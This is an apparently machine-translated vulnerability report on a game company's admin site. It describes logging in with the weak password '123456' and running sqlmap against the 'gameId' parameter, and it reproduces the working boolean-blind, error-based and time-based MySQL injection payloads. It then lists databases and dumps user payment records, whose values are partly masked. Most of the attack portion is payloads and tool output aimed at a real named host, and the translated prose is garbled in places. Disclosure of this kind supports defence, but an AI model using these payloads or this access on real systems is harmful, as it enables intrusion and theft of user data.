Hero mutual entertainment weak passwords in SQL injection at the background of a website (the number of game user data involved in a gun battle is unknown)

Hero mutual entertainment weak passwords in SQL injection at the background of a website (the number of game user data involved in a gun battle is unknown)

Take the small vendor-before getshell, It would be 2 rank AH (some of the information is also expected to be the administrator code ~)

There is a weak password when cracking the http://idk.yingxiong.com/
 

 

Mask Region

  
   [email protected]*****[email protected]*****[email protected]**********ngxion**********yingxi**********ingxio**********xiong**********gxiong**********yingxi*****[email protected]*****
  

 

The password is 123456.
 

Then we found some background statistics ~ Try to see if there is any injection.
 

 

http://idk.yingxiong.com:80/players/retained?gameId=131&type=0&begintime=2015%2F10%2F13&endtime=2016%2F01%2F11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1 (GET)

 

 

sqlmap identified the following injection points with a total of 71 HTTP(s) requests:---Parameter: gameId (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: gameId=131 AND 1182=1182-- wnlV&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: gameId=131 AND (SELECT 8411 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(8411=8411,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XyAs&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: gameId=131 AND (SELECT * FROM (SELECT(SLEEP(5)))OZKq)-- gFhL&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1---back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: gameId (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: gameId=131 AND 1182=1182-- wnlV&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: gameId=131 AND (SELECT 8411 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(8411=8411,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XyAs&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: gameId=131 AND (SELECT * FROM (SELECT(SLEEP(5)))OZKq)-- gFhL&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1---back-end DBMS: MySQL 5.0available databases [10]:

 

Mask Region

  
   ***** i**********tion_s********** k**********uxi**********ysq**********ance_s**********ngzh********** s**********tat********** t*****
  

 

The qiangzhan database contains many non-table names.
 

 

Mask Region

  
   *****gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********       *****
  

 

Inject a part of data randomly.
 

Let's take a look at user_pay. the user's recharge record is randomly selected for 100 entries.